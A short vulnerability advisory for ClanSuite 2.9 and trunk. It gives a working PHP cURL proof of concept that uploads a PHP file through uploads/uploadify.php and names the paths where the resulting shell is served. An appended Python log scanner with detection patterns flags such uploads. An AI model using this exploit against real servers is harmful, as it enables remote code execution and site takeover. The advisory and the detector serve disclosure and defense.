Title: ClanSuite 2.9 Arbitrary File Upload
Discoverer: Adrien Thierry
Program developer: http://clansuite.com/
https://github.com/jakoch/Clansuite , http://svn.gna.org/svn/clansuite/trunk/
Affected Versions: 2.9 and Trunk Revision 6400
Vulnerable file: uploads/uploadify.php
Test method:
<?php
$u = "C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php";
$c = curl_init("http://www.2cto.com/uploads/uploadify.php"); // Version 2.9
$c = curl_init("http://www.2cto.com/application/uploads/uploadify.php"); // Version trunk
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
    array('filedata' => "@$u",
          'name' => "info.php"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>
Shell location:
http://www.bkjia.com/uploads/temps/info.php
or http://www.bkjia.com/application/uploads/temps/info.php
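
Added example (not part of the original advisory or of the ClanSuite code): a log check for requests matching this issue, that is, POSTs to uploadify.php and requests for script files under uploads/temps/. The combined access-log format, the extension list, the function name scan and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Paths come from the advisory; both the 2.9 and the trunk layout are covered.
UPLOAD_RE = re.compile(r"/(?:application/)?uploads/uploadify\.php$", re.I)
# Assumed list of extensions a PHP-enabled server may execute.
DROPPED_RE = re.compile(
    r"/(?:application/)?uploads/temps/[^/]+\.(?:php\d?|phtml|phar)$", re.I)
# Assumed log format: Apache/nginx "combined".
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2013:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Mar/2013:10:02:11 +0000] "POST /uploads/uploadify.php HTTP/1.1" 200 1',
    '198.51.100.7 - - [12/Mar/2013:10:02:15 +0000] "GET /uploads/temps/info.php HTTP/1.1" 200 48211',
    '192.0.2.10 - - [12/Mar/2013:10:03:40 +0000] "GET /uploads/temps/avatar.png HTTP/1.1" 200 2048',
    '198.51.100.7 - - [12/Mar/2013:10:04:02 +0000] "GET /application/uploads/temps/info%2Ephp?x=1 HTTP/1.1" 404 210',
]

def scan(lines):
    """Return (line_no, client_ip, rule, decoded_path, status) per suspicious request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        # Drop the query string and decode %xx so "info%2Ephp" is seen as "info.php".
        path = unquote(urlsplit(m["target"]).path)
        status = int(m["status"])
        if m["method"] == "POST" and UPLOAD_RE.search(path):
            findings.append((n, m["ip"], "upload-endpoint-post", path, status))
        elif DROPPED_RE.search(path):
            findings.append((n, m["ip"], "script-in-upload-dir", path, status))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 on a script-in-upload-dir hit means the file exists and was served; the same client IP on a preceding upload-endpoint-post hit ties the two requests together.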